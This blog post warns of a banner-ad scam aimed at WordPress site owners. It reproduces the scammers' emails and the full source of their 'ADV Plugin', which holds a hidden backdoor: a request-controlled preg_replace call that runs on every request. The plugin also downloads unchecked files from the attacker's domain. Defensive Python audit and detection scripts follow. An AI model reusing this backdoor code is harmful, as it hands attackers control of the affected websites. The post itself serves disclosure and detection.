Banner Ads Scam with ADV Plugin for WordPress

A true story which might help someone out there
(I have replaced the real domain name with DOMAIN.COM):

A couple of days ago I received a few emails, written in not-that-good English, from “Valentin Lopez representing the Gera Agency” (vlopez@geraagency.com), apparently a French marketing company based in Paris. The complete text of the emails is reproduced below in this article (apart from the domain name).


First Email
The first email was pretty brief. I didn’t pay much attention to it, but I replied asking for more information on this subject.

It was strange, though, that someone would be willing to buy banner ad space on a site that is under construction, with only a few pages of actual content and only a small amount of traffic (it is a WordPress site).

Subject: We would like to buy banner space on DOMAIN.COM.
 
Hi,
 
I am sorry I have to write you to e-mail from whois information of the domain. 
But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site DOMAIN.COM.
Is it possible to place banner on your site on a fee basis?
 
Best regards,
 
Valentin Lopez

Second Email
This one was more interesting: the banners are supposed to be for a well-known brand! It now also mentions the company name (Gera Agency) and contact details, including a fake-ish phone number.

Hello,
 
Thanks for reply to our proposal!
 
I represent Gera Agency. At the moment we are preparing an advertising campaign for Lacoste Company 
(it is a French company producing clothes, footwear, perfumery etc.) 
We already have designed banners for the campaign, they are the following sizes: 
160x600, 240x400, 300x250, 336x280, 468x60, 728x90.
What can be your price for one banner (banner should appear at ALL pages of your site) 
of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? 
Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
 
Best regards,
 
 
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

A quick look at the email headers gave more information:

Received: from colo-69-172-130-14.pilosoft.com (HELO nanaagency.com) (69.172.130.14)
          by colo-69-172-130-14.pilosoft.com with SMTP; 30 Jan 2012 ...
Message-ID: <something@nanaagency.com>

So there is also a Nana Agency involved, and its site is the same (apart from the agency name). I googled both but did not find any further information about these fictional agencies.

The Gera Agency domain shows no PageRank or Alexa Rank. A search on archive.org reveals that the domain name was previously used by some travel agent, so it is probably a dropped domain name.

A Whois search unfortunately doesn’t give much information, apart from the fact that the domain owner wishes to stay anonymous.
But it does indicate that the domain was registered on the same day, possibly even after the first email was sent.

Creation Date: 30-Jan-2012  
Expiration Date: 30-Jan-2013
 
Administrative Contact:
    PrivacyProtect.org
    Domain Admin        ()
    ID#10760, PO Box 16
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Nobby Beach
    null,QLD 4218
    AU
    Tel. +45.36946676

I just replied that I would like to see the banners first, and a third email came in.

Third Email
A brief one with a link to a “little app” for managing banner ads. It did indeed show animated GIF banners prepared in different variations and sizes to choose from.

Hi!
Here you can see our banners: http://docs.geraagency.com/lacoste/?view=1
 
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

I finally gave some inadequate prices, and a fourth email came in without any negotiation.

Fourth Email
To my surprise, someone had taken the effort to set up my account in the banner ad manager with the correct sizes, domain name etc. From the control panel one can download a WordPress plugin for placing the banner ads, called the “ADV Plugin”. There is also a help page with instructions.

Hi!
 
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.geraagency.com
To enter use the following data:
 
login: DOMAIN.COM
password: *********
 
 
You should install and activate the plugin in order to display advertisement. 
Before making payment, advertiser must approve location of the banner. 
The banner will be shown on your site when you add special code to your web- address 
(for example: http://DOMAIN.COM/?adv_test=1). 
It means, that visitors will see the banner only if it is approved and payment made.
 
To get installation instruction for your site type pass to: http://docs.geraagency.com/wp_install
To activate your site you have to enter the code: *********
 
What way of payment is suitable for you?
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

The plugin creates new directories and downloads files from the above-mentioned domain(s), putting the fate of the site in the hands of the Gera (or any other name) Agency.

It reads settings from a "config" file, from which it takes multiple items of the form
<banner_item>anything here even .mydodgyscript.php</banner_item>
and one match of
<show_banner>anything here</show_banner>
and it displays only the item specified in <show_banner></show_banner>.

So in theory one can click Download Banners and the plugin can download a somebanner.gif and a somethingdodgy.php and show only somebanner.gif, with everything looking fine; somethingdodgy.php can then be used to take control: upload, download, delete, modify…

What really happens with this plugin I don’t know, as I have never installed it on my server, but it depends on the people in control of the config file…
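
The gap between what is downloaded and what is displayed can be replayed offline. The following Python sketch is an added example, not part of the original post or of the plugin: it applies the same tag patterns used by downloadBanners() in the plugin source reproduced further down to a constructed server response and reports which files would be written, which fail an image allowlist, and which are never shown. The sample response, the allowlist and the name audit_banner_list are assumptions made for illustration.

```python
import re

# Allowlist for one entry: "<width>x<height>/<name>.<image extension>" (assumed policy).
SAFE_ITEM = re.compile(r"\d{2,4}x\d{2,4}/[A-Za-z0-9_-]+\.(gif|png|jpe?g)", re.I)

# Constructed sample of a getBannerList response (not captured from the real service).
SAMPLE_RESPONSE = (
    "<adv>lacoste</adv><mode>test</mode>"
    "<show_banner>lacoste/300x250/banner.gif</show_banner>"
    "<banner_item>300x250/banner.gif</banner_item>"
    "<banner_item>728x90/banner.gif</banner_item>"
    "<banner_item>300x250/helper.php</banner_item>"
)


def audit_banner_list(response):
    """Replay the plugin's tag matching and report what would land on disk."""
    items = re.findall(r"<banner_item>(.+?)</banner_item>", response)
    adv = re.search(r"<adv>(.+?)</adv>", response)
    shown = re.search(r"<show_banner>(.+?)</show_banner>", response)
    campaign = adv.group(1) if adv else ""
    displayed = shown.group(1) if shown else None
    report = {"displayed": displayed, "written": [],
              "not_images": [], "never_shown": []}
    for item in items:
        # The plugin only saves entries shaped exactly "size/file".
        if len(item.split("/")) != 2:
            continue
        rel = f"{campaign}/{item}"  # path below adv_banners/ that gets written
        report["written"].append(rel)
        if not SAFE_ITEM.fullmatch(item):
            report["not_images"].append(rel)  # saved, but not an image name
        if rel != displayed:
            report["never_shown"].append(rel)  # saved, but never rendered
    return report


if __name__ == "__main__":
    for key, value in audit_banner_list(SAMPLE_RESPONSE).items():
        print(key, value)
```

Anything listed under both not_images and never_shown is a file the site owner would never see in the browser but that still sits under the web root.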

The plugin code is below.
The same concept is used on many domains and under different “Agency” names; I hope this helps someone …

  • Noah Vincent / Legretto Agency
  • Tristan Muller / Gana Agency
  • Valentin Lopez / Gera Agency
  • Matthieu Colin / NanaAgency
  • Oscar Meunier / Kervel Agency
  • Eliott Arnaud / Larko Agency
  • Lilian Marchand / Lemma Agency
  • Rayan Meyer / Bevesto Agency
  • and others …
 
/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */
 
class AdvWidget extends WP_Widget {
 
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }
 
    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }
 
    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }
 
    function form($instance) {
 
    }
 
}
 
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
 
add_action('admin_menu', 'advPluginMenu');
 
register_activation_hook(__FILE__, 'advActivation');
 
define('ADV_SERVICE_DOMAIN', 'geraagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');
 
function advReadUrl($url) {
    if (function_exists('curl_init')) {        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}
 
function advActivation() {
    update_option('adv_place', 'widget');
}
 
register_deactivation_hook(__FILE__, 'advDeactivation');
 
function advDeactivation() {
    delete_option('adv_key');
}
 
function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}
 
function adv_show_banner() {
    advShowBanner();
}
 
function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}
 
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}
 
function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
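                // File name and contents both come from the remote service and are written
                // under the web root with no check on type or extension.
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));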
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}
 
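// Runs on every request, outside any function and before any login or capability check.
// Both the regex pattern and the replacement are taken from the request; a request-controlled
// preg_replace() pattern is a known backdoor construct, because on PHP before 7.0 the
// pattern's /e modifier makes the replacement run as code.
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');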
 
function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
 
    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';
 
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
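
A triage scan for the traces this plugin leaves on a server, as an added example that is not part of the original post: it walks a WordPress tree, flags PHP files matching indicators visible in the source above, and flags any file under adv_banners that does not start with an image signature. The rule names, the functions scan_source and scan_tree, and the embedded sample excerpt are assumptions made for illustration; the preg_replace rule is a heuristic that flags any request variable inside the call.

```python
import os
import re

# Constructed excerpt modelled on the plugin source above, used as sample input.
SAMPLE_PLUGIN = """/*
  Plugin Name: ADV
 */
define('ADV_SERVICE_DOMAIN', 'example.invalid');
$r = preg_replace($_POST['cadv'], $_POST['gadv'], 'adv 6');
"""

# Indicators taken from the plugin source shown on this page.
SOURCE_RULES = {
    "adv-plugin-header": re.compile(r"Plugin Name:\s*ADV\b"),
    "adv-service-define": re.compile(r"define\(\s*'ADV_SERVICE_(DOMAIN|URL)'"),
    "request-controlled-preg_replace": re.compile(
        r"preg_replace\s*\([^;]*?\$_(POST|GET|REQUEST|COOKIE)\b"),
}
# Leading bytes of GIF, PNG and JPEG files.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def scan_source(text):
    """Return the names of the rules that match one PHP file's text."""
    return sorted(name for name, rx in SOURCE_RULES.items() if rx.search(text))


def scan_tree(root):
    """Walk a WordPress tree and return sorted (relative path, finding) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        parts = os.path.relpath(dirpath, root).split(os.sep)
        in_banner_dir = "adv_banners" in parts
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1_000_000)
            # The plugin should only ever have stored images here.
            if in_banner_dir and not data.startswith(IMAGE_MAGIC):
                findings.append((rel, "non-image-in-adv_banners"))
            if name.lower().endswith((".php", ".phtml", ".inc")):
                for rule in scan_source(data.decode("utf-8", "replace")):
                    findings.append((rel, rule))
    return sorted(findings)
```

Call scan_tree() with the path of the WordPress document root; an empty list means none of these indicators were found, not that the site is clean.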